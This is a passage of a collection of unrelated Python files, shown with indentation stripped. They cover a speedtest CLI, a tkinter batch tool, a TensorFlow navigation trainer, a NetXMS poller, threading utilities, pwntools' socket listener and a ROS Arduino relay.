cum.append(3600)
continue
text = r.read(9)
if int(r.status) == 200 and text == 'test=test'.encode():
cum.append(total)
else:
cum.append(3600)
h.close()
avg = round((sum(cum) / 6) * 1000, 3)
results[avg] = server
fastest = sorted(results.keys())[0]
best = results[fastest]
best['latency'] = fastest
return best
def ctrl_c(signum, frame):
"""Catch Ctrl-C key sequence and set a shutdown_event for our threaded
operations
"""
global shutdown_event
shutdown_event.set()
raise SystemExit('\nCancelling...')
def version():
"""Print the version"""
raise SystemExit(__version__)
def speedtest():
"""Run the full speedtest.net test"""
global shutdown_event, source
shutdown_event = threading.Event()
signal.signal(signal.SIGINT, ctrl_c)
description = (
'Command line interface for testing internet bandwidth using '
'speedtest.net.\n'
'------------------------------------------------------------'
'--------------\n'
'https://github.com/sivel/speedtest-cli')
parser = ArgParser(description=description)
# Give optparse.OptionParser an `add_argument` method for
# compatibility with argparse.ArgumentParser
try:
parser.add_argument = parser.add_option
except AttributeError:
pass
parser.add_argument('--bytes', dest='units', action='store_const',
const=('bytes', 1), default=('bits', 8),
help='Display values in bytes instead of bits. Does '
'not affect the image generated by --share')
parser.add_argument('--share', action='store_true',
help='Generate and provide a URL to the speedtest.net '
'share results image')
parser.add_argument('--simple', action='store_true',
help='Suppress verbose output, only show basic '
'information')
parser.add_argument('--list', action='store_true',
help='Display a list of speedtest.net servers '
'sorted by distance')
parser.add_argument('--server', help='Specify a server ID to test against')
parser.add_argument('--mini', help='URL of the Speedtest Mini server')
parser.add_argument('--source', help='Source IP address to bind to')
parser.add_argument('--version', action='store_true',
help='Show the version number and exit')
options = parser.parse_args()
if isinstance(options, tuple):
args = options[0]
else:
args = options
del options
# Print the version and exit
if args.version:
version()
# If specified bind to a specific IP address
if args.source:
source = args.source
socket.socket = bound_socket
if not args.simple:
print_('Retrieving speedtest.net configuration...')
try:
config = getConfig()
except URLError:
print_('Cannot retrieve speedtest configuration')
sys.exit(1)
if not args.simple:
print_('Retrieving speedtest.net server list...')
if args.list or args.server:
servers = closestServers(config['client'], True)
if args.list:
serverList = []
for server in servers:
line = ('%(id)4s) %(sponsor)s (%(name)s, %(country)s) '
'[%(d)0.2f km]' % server)
serverList.append(line)
# Python 2.7 and newer seem to be ok with the resultant encoding
# from parsing the XML, but older versions have some issues.
# This block should detect whether we need to encode or not
try:
unicode()
print_('\n'.join(serverList).encode('utf-8', 'ignore'))
except NameError:
print_('\n'.join(serverList))
except IOError:
pass
sys.exit(0)
else:
servers = closestServers(config['client'])
if not args.simple:
print_('Testing from %(isp)s (%(ip)s)...' % config['client'])
if args.server:
try:
best = getBestServer(filter(lambda x: x['id'] == args.server,
servers))
except IndexError:
print_('Invalid server ID')
sys.exit(1)
elif args.mini:
name, ext = os.path.splitext(args.mini)
if ext:
url = os.path.dirname(args.mini)
else:
url = args.mini
urlparts = urlparse(url)
try:
f = urlopen(args.mini)
except:
print_('Invalid Speedtest Mini URL')
sys.exit(1)
else:
text = f.read()
f.close()
extension = re.findall('upload_extension: "([^"]+)"', text.decode())
if not extension:
for ext in ['php', 'asp', 'aspx', 'jsp']:
try:
f = urlopen('%s/speedtest/upload.%s' % (args.mini, ext))
except:
pass
else:
data = f.read().strip()
if (f.code == 200 and
len(data.splitlines()) == 1 and
re.match('size=[0-9]', data)):
extension = [ext]
break
if not urlparts or not extension:
print_('Please provide the full URL of your Speedtest Mini server')
sys.exit(1)
servers = [{
'sponsor': 'Speedtest Mini',
'name': urlparts[1],
'd': 0,
'url': '%s/speedtest/upload.%s' % (url.rstrip('/'), extension[0]),
'latency': 0,
'id': 0
}]
try:
best = getBestServer(servers)
except:
best = servers[0]
else:
if not args.simple:
print_('Selecting best server based on latency...')
best = getBestServer(servers)
if not args.simple:
# Python 2.7 and newer seem to be ok with the resultant encoding
# from parsing the XML, but older versions have some issues.
# This block should detect whether we need to encode or not
try:
unicode()
print_(('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
'%(latency)s ms' % best).encode('utf-8', 'ignore'))
except NameError:
print_('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
'%(latency)s ms' % best)
else:
print_('Ping: %(latency)s ms' % best)
sizes = [350, 500, 750, 1000, 1500, 2000, 2500, 3000, 3500, 4000]
urls = []
for size in sizes:
for i in range(0, 4):
urls.append('%s/random%sx%s.jpg' %
(os.path.dirname(best['url']), size, size))
if not args.simple:
print_('Testing download speed', end='')
dlspeed = downloadSpeed(urls, args.simple)
if not args.simple:
print_()
print_('Download: %0.2f M%s/s' %
((dlspeed / 1000 / 1000) * args.units[1], args.units[0]))
sizesizes = [int(.25 * 1000 * 1000), int(.5 * 1000 * 1000)]
sizes = []
for size in sizesizes:
for i in range(0, 25):
sizes.append(size)
if not args.simple:
print_('Testing upload speed', end='')
ulspeed = uploadSpeed(best['url'], sizes, args.simple)
if not args.simple:
print_()
print_('Upload: %0.2f M%s/s' %
((ulspeed / 1000 / 1000) * args.units[1], args.units[0]))
if args.share and args.mini:
print_('Cannot generate a speedtest.net share results image while '
'testing against a Speedtest Mini server')
elif args.share:
dlspeedk = int(round((dlspeed / 1000) * 8, 0))
ping = int(round(best['latency'], 0))
ulspeedk = int(round((ulspeed / 1000) * 8, 0))
# Build the request to send results back to speedtest.net
# We use a list instead of a dict because the API expects parameters
# in a certain order
apiData = [
'download=%s' % dlspeedk,
'ping=%s' % ping,
'upload=%s' % ulspeedk,
'promo=',
'startmode=%s' % 'pingselect',
'recommendedserverid=%s' % best['id'],
'accuracy=%s' % 1,
'serverid=%s' % best['id'],
'hash=%s' % md5(('%s-%s-%s-%s' %
(ping, ulspeedk, dlspeedk, '297aae72'))
.encode()).hexdigest()]
req = Request('http://www.speedtest.net/api/api.php',
data='&'.join(apiData).encode())
req.add_header('Referer', 'http://c.speedtest.net/flash/speedtest.swf')
f = urlopen(req)
response = f.read()
code = f.code
f.close()
if int(code) != 200:
print_('Could not submit results to speedtest.net')
sys.exit(1)
qsargs = parse_qs(response.decode())
resultid = qsargs.get('resultid')
if not resultid or len(resultid) != 1:
print_('Could not submit results to speedtest.net')
sys.exit(1)
print_('Share results: http://www.speedtest.net/result/%s.png' %
resultid[0])
def main():
try:
speedtest()
except KeyboardInterrupt:
print_('\nCancelling...')
if __name__ == '__main__':
main()
# vim:ts=4:sw=4:expandtab
|
batch.py |
import tkinter
from tkinter import *
from tkinter import ttk
import threading
import time
from tkinter import filedialog, messagebox
from imageProcess import ImageProcess
import os
class Batch():
def __init__(self, master, treeview, save_path, dirname):
self.save_path = save_path
self.dirname = dirname
self.treeview = treeview
self.w = Toplevel(master)
self.w.grab_set()
self.w.title('batch process')
# self.w.pack()
Button(self.w, text = 'choose a folder to save results', command = self._on_path).grid(row = 0, column = 0, sticky = 'w', padx = (5,5), pady = (5,2))
self.dirPath = Entry(self.w, width = 120)
self.dirPath.insert(0, self.save_path)
self.dirPath.grid(row = 1, column = 0, columnspan = 2,sticky = 'w', padx = (5,5))
self.var_wafer = IntVar(value = 1)
self.var_rgb_data = IntVar(value = 1)
check_f = LabelFrame(self.w, text = 'choose which files to save', fg = 'blue')
check_f.grid(row = 2, column = 0, sticky = 'w', pady = (5,5), padx = (5,5))
Checkbutton(check_f, text = 'wafer image', variable = self.var_wafer, fg= 'blue',onvalue = 1, offvalue = 0, command = self._on_wafer).pack(side = 'left', padx = (5,5))
Checkbutton(check_f, text = 'RGB .cvs', variable = self.var_rgb_data, fg= 'blue',onvalue = 1, offvalue = 0,command = self._on_rgb_data).pack(side = 'left', padx = (5,5))
Button(self.w, text = 'run', width = 8, fg = 'red', command=self._on_run).grid(row = 3, column =1, sticky = 'e', padx = (5,5), pady = (5,5))
def _on_run(self):
self.run(self.treeview)
self.w.destroy()
def _on_wafer(self):
self.var_wafer.set(0) if self.var_wafer.get() ==0 else self.var_wafer.set(1)
def _on_rgb_data(self):
self.var_rgb_data.set(0) if self.var_rgb_data.get() ==0 else self.var_rgb_data.set(1)
def _on_path(self):
self.save_path = filedialog.askdirectory()
self.dirPath.delete(0, 'end')
self.dirPath.insert(0, self.save_path)
def run(self, treeview):
threading.Thread(target = lambda treeview = treeview:self.go(treeview)).start()
def go(self, treeview):
succeed = 0
fail = 0
for index in treeview.get_children():
treeview.focus(index)
treeview.selection_set(index)
treeview.item(index, tags = index)
imageName = self.treeview.item(index, 'text')
try:
imageProcess = ImageProcess(os.path.join(self.dirname,imageName))
image_path = os.path.join(self.save_path,imageName[:-4])
if self.var_rgb_data.get() ==1:
imageProcess.save_rgb_data(image_path)
if self.var_wafer.get() ==1:
imageProcess.save_wafer_image(image_path)
treeview.tag_configure(index, background='lightgreen')
succeed += 1
except Exception:
treeview.tag_configure(index, background='tomato')
fail += 1
time.sleep(0.2)
messagebox.showinfo(message =f'{succeed} succeeded and {fail} failed')
def main():
# print(version('tkinter'))
# import pkg_resources
# print(pkg_resources.get_distribution('tkinter').version)
root = Tk()
# Batch requires a populated treeview plus save/source directories.
treeview = ttk.Treeview(root)
treeview.pack()
for i in range(8):
treeview.insert("", 'end', text = i)
# ttk.Style().theme_use('clam')
Batch(root, treeview, save_path = os.getcwd(), dirname = os.getcwd())
root.mainloop()
if __name__ == '__main__':
main()
|
train.py | #!/usr/bin/env python
from worker import *
from network import *
import threading
from time import sleep
flags = tf.app.flags
FLAGS = flags.FLAGS
flags.DEFINE_boolean('is_approaching_policy', False, 'If learning approaching policy.')
flags.DEFINE_integer('max_episodes', 100000, 'Maximum episodes.')
flags.DEFINE_integer('max_episode_steps', 1000, 'Maximum steps for each episode.')
flags.DEFINE_integer('max_lowlevel_episode_steps', 50,
'Maximum number of steps the robot can take during one episode in low-level policy.')
flags.DEFINE_integer('batch_size', 64,
'The size of replay memory used for training.')
flags.DEFINE_float('gamma', 0.99, 'Discount factor.')
flags.DEFINE_boolean('use_gt', False, 'If use ground truth detection.')
flags.DEFINE_integer('window_size', 10, 'The size of vision window.')
flags.DEFINE_integer('num_labels', 78, 'The size of option space.')
flags.DEFINE_integer('a_size', 6, 'The size of action space.')
flags.DEFINE_integer('history_steps', 4, 'The number of steps need to remember during training.')
flags.DEFINE_multi_float('er', [0.01, 1000, 0.01],
'[Initial exploration rate, anneal steps, final exploration rate]')
flags.DEFINE_float('highlevel_lr', 0.0001, 'Highlevel learning rate.')
flags.DEFINE_float('lowlevel_lr', 0.0001, 'Lowlevel learning rate.')
flags.DEFINE_string('vision_feature_pattern', '_deeplab_depth_logits_10', 'Which feature to use to represent vision.')
flags.DEFINE_string('depth_feature_pattern', '_deeplab_depth_depth1_10', 'Which feature to use to represent depth.')
flags.DEFINE_integer('replay_start_size', 0, 'The number of observations stored in the replay buffer before training.')
flags.DEFINE_integer('skip_frames', 1, 'The times for low-level action to repeat.')
flags.DEFINE_integer('highlevel_update_freq', 100, 'Highlevel network update frequency.')
flags.DEFINE_integer('lowlevel_update_freq', 10, 'Lowlevel network update frequency.')
flags.DEFINE_integer('target_update_freq', 100000, 'Target network update frequency.')
flags.DEFINE_multi_float('epsilon', [1, 10000, 0.1],
'[Initial exploration rate, anneal steps, final exploration rate]')
flags.DEFINE_boolean('load_model', True, 'If load previous trained model or not.')
flags.DEFINE_boolean('curriculum_training', True, 'If use curriculum training or not.')
flags.DEFINE_boolean('continuing_training', False, 'If continue training or not.')
flags.DEFINE_string('pretrained_model_path', '../A3C/result_se_for_pretrain/model', 'The path to load pretrained model from.')
flags.DEFINE_string('model_path', './result_se_pretrain/model', 'The path to store or load model from.')
flags.DEFINE_integer('num_scenes', 8, 'The number of scenes used for training.')
flags.DEFINE_integer('num_targets', 15, 'The number of targets for each scene that are used for training.')
flags.DEFINE_integer('num_threads', 1, 'The number of threads to train one scene one target.')
flags.DEFINE_boolean('use_default_scenes', True, 'If use default scenes for training.')
flags.DEFINE_boolean('use_default_targets', True, 'If use default targets for training.')
flags.DEFINE_multi_string('default_scenes',['5cf0e1e9493994e483e985c436b9d3bc',
'0c9a666391cc08db7d6ca1a926183a76',
'0c90efff2ab302c6f31add26cd698bea',
'00d9be7210856e638fa3b1addf2237d6',
'07d1d46444ca33d50fbcb5dc12d7c103',
'026c1bca121239a15581f32eb27f2078',
'0147a1cce83b6089e395038bb57673e3',
'0880799c157b4dff08f90db221d7f884'
],
'Default scenes')
flags.DEFINE_multi_string('default_targets',
['music', 'television', 'heater', 'stand', 'dressing_table', 'table',
'bed', 'mirror', 'ottoman', 'sofa', 'desk', 'picture_frame', 'tv_stand',
'toilet', 'bathtub'
],
'Default targets.')
flags.DEFINE_string('evaluate_file', '', '')
def get_trainable_scenes_and_targets(use_gt=True):
if FLAGS.use_default_scenes:
scenes = FLAGS.default_scenes
else:
scenes = json.load(open('%s/Environment/collected_houses.json' % cfg['codeDir'], 'r'))['houses']
targets = []
starting_points = []
target_points = []
for scene in scenes[:FLAGS.num_scenes]:
scene_dir = '%s/Environment/houses/%s/' % (cfg['codeDir'], scene)
if FLAGS.use_default_targets:
all_targets = FLAGS.default_targets
else:
if FLAGS.use_gt:
all_targets = json.load(open('%s/targets_info_all.json' % scene_dir, 'r')).keys()
else:
all_targets = json.load(open('%s/targets_info_all_pred.json' % scene_dir, 'r')).keys()
all_target_points = get_target_points(scene, all_targets, use_gt=True)
all_starting_points = get_starting_points(scene, all_targets, use_gt=FLAGS.use_gt) \
if FLAGS.is_approaching_policy else get_starting_points_according_to_distance(scene, all_targets)
scene_targets = []
scene_target_points = []
scene_starting_points = []
num_targets = 0
for i,t in enumerate(all_targets):
t_points = all_target_points[t]
s_points = [p for p in all_starting_points[i] if p not in t_points]
if len(t_points) != 0 and len(s_points) != 0:
scene_targets.append(t)
scene_target_points.append(t_points)
scene_starting_points.append(s_points)
num_targets += 1
if num_targets == FLAGS.num_targets: break
if FLAGS.is_approaching_policy and FLAGS.curriculum_training:
scene_starting_points = sort_starting_points_according_to_distance(scene, scene_targets, scene_starting_points)
targets.append(scene_targets)
starting_points.append(scene_starting_points)
target_points.append(scene_target_points)
return scenes, targets, starting_points, target_points
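# The four returned lists are parallel and indexed by scene: targets[i] is the
# list of target names for scenes[i], while starting_points[i][j] and
# target_points[i][j] hold the candidate start and goal points for targets[i][j].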
def set_up():
if not os.path.exists(FLAGS.model_path):
os.makedirs(FLAGS.model_path)
tf.reset_default_graph()
graph = tf.Graph()
with graph.as_default():
global_episodes = tf.Variable(0, dtype=tf.int32, name='global_episodes', trainable=False)
global_frames = tf.Variable(0, dtype=tf.int32, name='global_frames', trainable=False)
lowlevel_network = Lowlevel_Network(window_size=FLAGS.window_size,
num_labels=FLAGS.num_labels,
action_size=FLAGS.a_size,
history_steps=FLAGS.history_steps,
scope='global')
scenes, targets, starting_points, target_points = get_trainable_scenes_and_targets()
tools = []
min_steps = []
for scene in scenes:
vision_feature_tool = Feature_Tool(scene_name=scene, feature_pattern=FLAGS.vision_feature_pattern)
depth_feature_tool = Feature_Tool(scene_name=scene, feature_pattern=FLAGS.depth_feature_pattern)
bbox_tool = Bbox_Tool(scene, use_gt=FLAGS.use_gt)
tools.append([vision_feature_tool, depth_feature_tool, bbox_tool])
min_steps.append(json.load(open('%s/Environment/houses/%s/minimal_steps_1.json' % (cfg['codeDir'], scene), 'r')))
workers = []
for i in range(FLAGS.num_threads):
local_lowlevel_network = Lowlevel_Network(window_size=FLAGS.window_size,
num_labels=FLAGS.num_labels,
action_size=FLAGS.a_size,
history_steps=FLAGS.history_steps,
scope='local_%d'%i)
worker = Worker(name=i,
scenes=scenes,
targets=targets,
min_steps=min_steps,
starting_points=starting_points,
target_points=target_points,
tools=tools,
lowlevel_network=local_lowlevel_network,
global_episodes=global_episodes,
global_frames=global_frames)
workers.append(worker)
return graph, workers
def train():
graph, workers = set_up()
with tf.Session(graph=graph) as sess:
coord = tf.train.Coordinator()
all_threads = []
for worker in workers:
thread = threading.Thread(target=lambda: worker.work(sess))
thread.start()
sleep(0.1)
all_threads.append(thread)
coord.join(all_threads)
if __name__ == '__main__':
train()
|
poll_all_nodes.py | #!/usr/bin/env nxshell
import threading
import org.netxms.client.TextOutputListener
from Queue import Queue
from threading import Thread
class ProgressCallback(org.netxms.client.TextOutputListener):
def messageReceived(self, text):
print(self.tag + ": " + text.strip())
pass
def onError(self):
print(self.tag + ": onError")
pass
def setStreamId(self, streamId):
pass
def worker():
while True:
print("###: qsize %s ###" % q.qsize());
node = q.get()
cb = ProgressCallback()
cb.tag = node.objectName
s.pollNode(node.objectId, NodePollType.CONFIGURATION_NORMAL, cb)
#s.pollNode(node.objectId, NodePollType.CONFIGURATION_FULL, cb)
q.task_done()
q = Queue()
for i in range(25):
t = Thread(target=worker, name="Thread %d" % i)
t.daemon = True
t.start()
nodes = [o for o in s.allObjects if isinstance(o, objects.Node)]
for node in nodes:
q.put(node)
q.join()
print("######## ALL DONE")
|
utils.py | import sys
import platform
import threading
try:
if platform.system() == "Windows":
import colorama
import win32console
colorama.init()
except ImportError:
print("Could not init terminal features.")
sys.stdout.flush()
if sys.version_info < (3, 3):
class TimeoutError(Exception):
pass
else:
TimeoutError = TimeoutError
def get_serial_number_str(device):
if hasattr(device, "serial_number"):
return format(device.serial_number, "x").upper()
else:
return "[unknown serial number]"
class Event:
"""
Alternative to threading.Event(), enhanced by the subscribe() function
that the original fails to provide.
@param trigger: if supplied, the newly created event will be triggered
as soon as the trigger event becomes set
"""
def __init__(self, trigger=None):
self._evt = threading.Event()
self._subscribers = []
self._mutex = threading.Lock()
if trigger is not None:
trigger.subscribe(lambda: self.set())
def is_set(self):
return self._evt.is_set()
def set(self):
"""
Sets the event and invokes all subscribers if the event was
not already set
"""
self._mutex.acquire()
try:
if not self._evt.is_set():
self._evt.set()
for s in self._subscribers:
s()
finally:
self._mutex.release()
def subscribe(self, handler):
"""
Invokes the specified handler exactly once as soon as the
specified event is set. If the event is already set, the
handler is invoked immediately.
Returns a function that can be invoked to unsubscribe.
"""
if handler is None:
raise TypeError
self._mutex.acquire()
try:
self._subscribers.append(handler)
if self._evt.is_set():
handler()
finally:
self._mutex.release()
return handler
def unsubscribe(self, handler):
self._mutex.acquire()
try:
self._subscribers.pop(self._subscribers.index(handler))
finally:
self._mutex.release()
def wait(self, timeout=None):
if not self._evt.wait(timeout=timeout):
raise TimeoutError()
def trigger_after(self, timeout):
"""
Triggers the event after the specified timeout.
This function returns immediately.
"""
def delayed_trigger():
# wait() raises TimeoutError if the event is not set in time;
# in that case we trigger the event ourselves.
try:
self.wait(timeout=timeout)
except TimeoutError:
self.set()
t = threading.Thread(target=delayed_trigger)
t.daemon = True
t.start()
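# Minimal usage sketch for the Event class above:
# evt = Event()
# handler = evt.subscribe(lambda: print("fired"))  # runs immediately if already set
# evt.set()                                        # invokes every subscriber exactly once
# evt.unsubscribe(handler)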
def wait_any(timeout=None, *events):
"""
Blocks until any of the specified events are triggered.
Returns the index of the event that was triggered or raises
a TimeoutError
Param timeout: A timeout in seconds
"""
or_event = threading.Event()
subscriptions = []
for event in events:
subscriptions.append((event, event.subscribe(lambda: or_event.set())))
or_event.wait(timeout=timeout)
for event, sub in subscriptions:
event.unsubscribe(sub)
for i in range(len(events)):
if events[i].is_set():
return i
raise TimeoutError()
class Logger:
"""
Logs messages to stdout
"""
COLOR_DEFAULT = 0
COLOR_GREEN = 1
COLOR_CYAN = 2
COLOR_YELLOW = 3
COLOR_RED = 4
_VT100Colors = {COLOR_GREEN: "\x1b[92;1m", COLOR_CYAN: "\x1b[96;1m", COLOR_YELLOW: "\x1b[93;1m", COLOR_RED: "\x1b[91;1m", COLOR_DEFAULT: "\x1b[0m"}
_Win32Colors = {COLOR_GREEN: 0x0A, COLOR_CYAN: 0x0B, COLOR_YELLOW: 0x0E, COLOR_RED: 0x0C, COLOR_DEFAULT: 0x07}
def __init__(self, verbose=True):
self._prefix = ""
self._skip_bottom_line = False
self._verbose = verbose
self._print_lock = threading.Lock()
if platform.system() == "Windows":
self._stdout_buf = win32console.GetStdHandle(win32console.STD_OUTPUT_HANDLE)
def indent(self, prefix=" "):
indented_logger = Logger()
indented_logger._prefix = self._prefix + prefix
return indented_logger
def print_on_second_last_line(self, text, color):
"""
Prints a text on the second last line.
This can be used to print a message above the command
prompt. If the command prompt spans multiple lines
there will be glitches.
If the printed text spans multiple lines there will also
be glitches (though this could be fixed).
"""
if platform.system() == "Windows":
info = self._stdout_buf.GetConsoleScreenBufferInfo()
cursor_pos = info["CursorPosition"]
scroll_rect = win32console.PySMALL_RECTType(Left=0, Top=1, Right=info["Window"].Right, Bottom=cursor_pos.Y - 1)
scroll_dest = win32console.PyCOORDType(scroll_rect.Left, scroll_rect.Top - 1)
self._stdout_buf.ScrollConsoleScreenBuffer(scroll_rect, scroll_rect, scroll_dest, u" ", Logger._Win32Colors[color])
line_start = win32console.PyCOORDType(0, cursor_pos.Y - 1)
self._stdout_buf.WriteConsoleOutputCharacter(text, line_start)
else:
self._print_lock.acquire()
sys.stdout.write("\x1b7\x1b[1A\x1b[1S\x1b[1L")
sys.stdout.write(Logger._VT100Colors[color] + text + Logger._VT100Colors[Logger.COLOR_DEFAULT])
sys.stdout.write("\x1b8")
sys.stdout.flush()
self._print_lock.release()
def print_colored(self, text, color):
if self._skip_bottom_line:
self.print_on_second_last_line(text, color)
else:
self._print_lock.acquire()
sys.stdout.write(Logger._VT100Colors[color] + text + Logger._VT100Colors[Logger.COLOR_DEFAULT] + "\n")
sys.stdout.flush()
self._print_lock.release()
def debug(self, text):
if self._verbose:
self.print_colored(self._prefix + text, Logger.COLOR_DEFAULT)
def success(self, text):
self.print_colored(self._prefix + text, Logger.COLOR_GREEN)
def info(self, text):
self.print_colored(self._prefix + text, Logger.COLOR_DEFAULT)
def notify(self, text):
self.print_colored(self._prefix + text, Logger.COLOR_CYAN)
def warn(self, text):
self.print_colored(self._prefix + text, Logger.COLOR_YELLOW)
def error(self, text):
self.print_colored(self._prefix + text, Logger.COLOR_RED) |
listen.py | import errno
import socket
from ..context import context
from ..log import getLogger
from ..timeout import Timeout
from .sock import sock
log = getLogger(__name__)
class listen(sock):
"""Creates an TCP or UDP-socket to receive data on. It supports
both IPv4 and IPv6.
The returned object supports all the methods from
:class:`pwnlib.tubes.sock` and :class:`pwnlib.tubes.tube`.
Arguments:
port(int): The port to connect to.
bindaddr(str): The address to bind to.
fam: The string "any", "ipv4" or "ipv6" or an integer to pass to :func:`socket.getaddrinfo`.
typ: The string "tcp" or "udp" or an integer to pass to :func:`socket.getaddrinfo`.
timeout: A positive number, None
"""
def __init__(self, port=0, bindaddr = "0.0.0.0",
fam = "any", typ = "tcp",
timeout = Timeout.default, level = None):
super(listen, self).__init__(timeout, level = level)
port = int(port)
if fam == 'any':
fam = socket.AF_UNSPEC
elif fam == 4 or fam.lower() in ['ipv4', 'ip4', 'v4', '4']:
fam = socket.AF_INET
elif fam == 6 or fam.lower() in ['ipv6', 'ip6', 'v6', '6']:
fam = socket.AF_INET6
elif isinstance(fam, (int, long)):
pass
else:
self.error("remote(): family %r is not supported" % fam)
if typ == "tcp":
typ = socket.SOCK_STREAM
elif typ == "udp":
typ = socket.SOCK_DGRAM
elif isinstance(typ, (int, long)):
pass
else:
self.error("remote(): type %r is not supported" % typ)
h = self.waitfor('Trying to bind to %s on port %d' % (bindaddr, port))
for res in socket.getaddrinfo(bindaddr, port, fam, typ, 0, socket.AI_PASSIVE):
self.family, self.type, self.proto, self.canonname, self.sockaddr = res
if self.type not in [socket.SOCK_STREAM, socket.SOCK_DGRAM]:
continue
h.status("Trying %s" % self.sockaddr[0])
listen_sock = socket.socket(self.family, self.type, self.proto)
listen_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listen_sock.bind(self.sockaddr)
self.lhost, self.lport = listen_sock.getsockname()[:2]
if self.type == socket.SOCK_STREAM:
listen_sock.listen(1)
break
else:
h.failure()
self.error("Could not bind to %s on port %d" % (bindaddr, port))
h.success()
h = self.waitfor('Waiting for connections on %s:%s' % (self.lhost, self.lport))
def accepter():
while True:
try:
if self.type == socket.SOCK_STREAM:
self.sock, rhost = listen_sock.accept()
listen_sock.close()
else:
self.buffer, rhost = listen_sock.recvfrom(4096)
listen_sock.connect(rhost)
self.sock = listen_sock
self.settimeout(self.timeout)
break
except socket.error as e:
if e.errno == errno.EINTR:
continue
h.failure()
self.exception("Socket failure while waiting for connection")
self.sock = None
return
self.rhost, self.rport = rhost[:2]
h.success('Got connection from %s on port %d' % (self.rhost, self.rport))
self._accepter = context.Thread(target = accepter)
self._accepter.daemon = True
self._accepter.start()
def spawn_process(self, *args, **kwargs):
def accepter():
self.wait_for_connection()
p = super(listen, self).spawn_process(*args, **kwargs)
p.wait()
self.close()
t = context.Thread(target = accepter)
t.daemon = True
t.start()
def wait_for_connection(self):
"""Blocks until a connection has been established."""
self.sock
return self
def __getattr__(self, key):
if key == 'sock':
while self._accepter.is_alive():
self._accepter.join(timeout = 0.1)
if 'sock' in self.__dict__:
return self.sock
else:
return None
else:
return getattr(super(listen, self), key)
def close(self):
# since `close` is scheduled to run on exit we must check that we got
# a connection or the program will hang in the `join` call above
if self._accepter.is_alive():
return
super(listen, self).close()
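# Minimal usage sketch for the listen class above (within pwnlib):
# l = listen(4141)
# conn = l.wait_for_connection()  # blocks until a client connects
# conn.close()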
|
arduino_relay.py | #!/usr/bin/env python
from __future__ import print_function
#import time
from math import pi
# import traceback
import os
import sys
import time
import threading
# import cPickle as pickle
from functools import partial
#from math import pi, sin, cos
#import numpy as np
import rospy
import tf
#import tf2_ros
#http://docs.ros.org/api/sensor_msgs/html/msg/Imu.html
from sensor_msgs.msg import Imu
#http://wiki.ros.org/std_msgs
from sensor_msgs.msg import JointState
from std_msgs.msg import Header, String, UInt16MultiArray, Bool, Int16
#from std_srvs.srv import Empty, EmptyResponse
from nav_msgs.msg import Odometry
from geometry_msgs.msg import Quaternion, Point
from diagnostic_msgs.msg import DiagnosticArray, DiagnosticStatus#, KeyValue
from ros_homebot_python.node import say
from ros_homebot_python import constants as c
#from ros_homebot_python.node import BaseArduinoNode
OK = DiagnosticStatus.OK # 0
WARN = DiagnosticStatus.WARN # 1
ERROR = DiagnosticStatus.ERROR # 2
STALE = DiagnosticStatus.STALE # 3
IMU_CALIBRATION_FN = 'imu_calibration.pickle'
V0 = 'v0'
V1 = 'v1'
status_id_to_name = {
OK: 'OK',
WARN: 'WARN',
ERROR: 'ERROR',
STALE: 'STALE',
}
def ltof(values):
"""
Converts the special integer-encoded doubles back into Python floats.
See the Arduino's equivalent ftol().
"""
assert isinstance(values, (tuple, list))
return [int(_)/1000. for _ in values]
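# Example of the encoding (hypothetical values): the Arduino sends floats
# scaled by 1000 as integers, so ltof([1500, -250, 0]) == [1.5, -0.25, 0.0].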
# Based on https://goo.gl/mY0th1
# http://wiki.ros.org/tf2/Tutorials/Writing%20a%20tf2%20broadcaster%20%28Python%29
# http://wiki.ros.org/navigation/Tutorials/RobotSetup/Odom
# http://answers.ros.org/question/79851/python-odometry/
class ArduinoRelay:
cache_dir = '~/.homebot_cache/torso_relay'
# Covariance
#P = np.mat(np.diag([0.0]*3))
def __init__(self):
rospy.init_node('arduino_relay')
self._imu_data = {}
self._lock = threading.RLock()
# self.imu_calibration_loaded = False
# self.imu_calibration_loaded_time = rospy.Time(0)
self.diagnostics_msg_count = 0
self.diagnostics_buffer = []
# http://wiki.ros.org/tf/Tutorials/Writing%20a%20tf%20broadcaster%20%28Python%29
self.tf_br = tf.TransformBroadcaster()
#self.tf2_br = tf2_ros.TransformBroadcaster()
#rospy.Service('~reset_odometry', Empty, self.reset_odometry)
## Publishers.
self.diagnostics_pub = rospy.Publisher('/diagnostics', DiagnosticArray, queue_size=10)
self.odometry_pub = rospy.Publisher('/odom', Odometry, queue_size=10)
self.imu_calibration_load_pub = rospy.Publisher('/torso_arduino/imu_calibration_load', UInt16MultiArray, queue_size=1)
self.imu_pub = rospy.Publisher('/imu_data', Imu, queue_size=10)
self.joint_pub = rospy.Publisher('joint_states', JointState, queue_size=10)
self._joint_pub_lock = threading.RLock()
self.last_pan_angle = None
self.last_tilt_angle = None
self.received_angles = False
self._joint_pub_thread = threading.Thread(target=self.publish_joints_thread)
self._joint_pub_thread.daemon = True
self._joint_pub_thread.start()
## Head Subscribers.
rospy.Subscriber('/head_arduino/diagnostics_relay', String, partial(self.on_diagnostics_relay, prefix='head'))
rospy.Subscriber('/head_arduino/pan_degrees', Int16, self.on_head_pan_degrees)
rospy.Subscriber('/head_arduino/tilt_degrees', Int16, self.on_head_tilt_degrees)
## Torso Subscribers.
rospy.Subscriber('/torso_arduino/diagnostics_relay', String, partial(self.on_diagnostics_relay, prefix='torso'))
# rospy.Subscriber('/torso_arduino/imu_calibration_save', UInt16MultiArray, self.on_imu_calibration_save)
rospy.Subscriber('/torso_arduino/imu_relay', String, self.on_imu_relay)
rospy.Subscriber('/torso_arduino/odometry_relay', String, self.on_odometry_relay)
rospy.Subscriber('/torso_arduino/power_shutdown', Bool, self.on_power_shutdown)
self._odom_lock = threading.RLock()
self.pos = None
self.ori = None
# self._motor_target_left = None
# self._motor_target_right = None
# rospy.Subscriber('/torso_arduino/motor_target_a', Int16, partial(self.on_motor_target, side='left'))
# rospy.Subscriber('/torso_arduino/motor_target_b', Int16, partial(self.on_motor_target, side='right'))
# self._motor_encoder_left = None
# self._motor_encoder_right = None
# rospy.Subscriber('/torso_arduino/motor_encoder_a', Int16, partial(self.on_motor_encoder, side='left'))
# rospy.Subscriber('/torso_arduino/motor_encoder_b', Int16, partial(self.on_motor_encoder, side='right'))
## Begin IO.
rospy.spin()
@property
def imu_calibration_filename(self):
cache_dir = os.path.expanduser(self.cache_dir)
if not os.path.isdir(cache_dir):
os.makedirs(cache_dir)
fn = os.path.join(cache_dir, IMU_CALIBRATION_FN)
return fn
# def load_imu_calibration(self):
